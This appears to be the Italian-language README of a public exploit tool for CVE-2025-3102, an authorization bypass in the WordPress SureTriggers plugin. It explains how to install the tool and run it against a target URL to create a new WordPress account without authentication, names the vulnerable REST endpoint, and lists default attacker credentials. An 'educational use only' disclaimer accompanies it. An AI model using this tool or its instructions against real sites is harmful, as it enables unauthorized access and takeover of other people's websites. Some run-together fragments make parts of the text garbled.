
SureTriggers <= 1.0.78 - Exploit di bypass dell'autorizzazione
Questo strumento sfrutta una vulnerabilità di bypass dell'autorizzazione nel plugin WordPress SureTriggers (versioni <= 1.0.78), consentendo ad attaccanti non autenticati di creare nuovi account utente WordPress.
🔥 Sviluppato da 0xgh057r3c0n
requests, coloramaInstalla le dipendenze:
pip3 install -r requirements.txt
Oppure manualmente:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <target_url> [--newmail <email>] [--newuser <username>] [--newpassword <password>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt.wp-json/sure-triggers/v1/automation/action.Questo strumento è fornito solo per scopi educativi e di test di penetrazione autorizzati. L'accesso non autorizzato ai sistemi è illegale e punibile dalla legge. L'autore non è responsabile per qualsiasi uso improprio o danno causato.
| Argomento | Descrizione | Predefinito |
|---|
-u, --url | URL base del sito WordPress | Obbligatorio |
--newmail | Indirizzo email per il nuovo utente | [email protected] |
--newuser | Nome utente da creare | 0xgh057r3c0n |
--newpassword | Password per il nuovo utente | Wiz007@8876@ |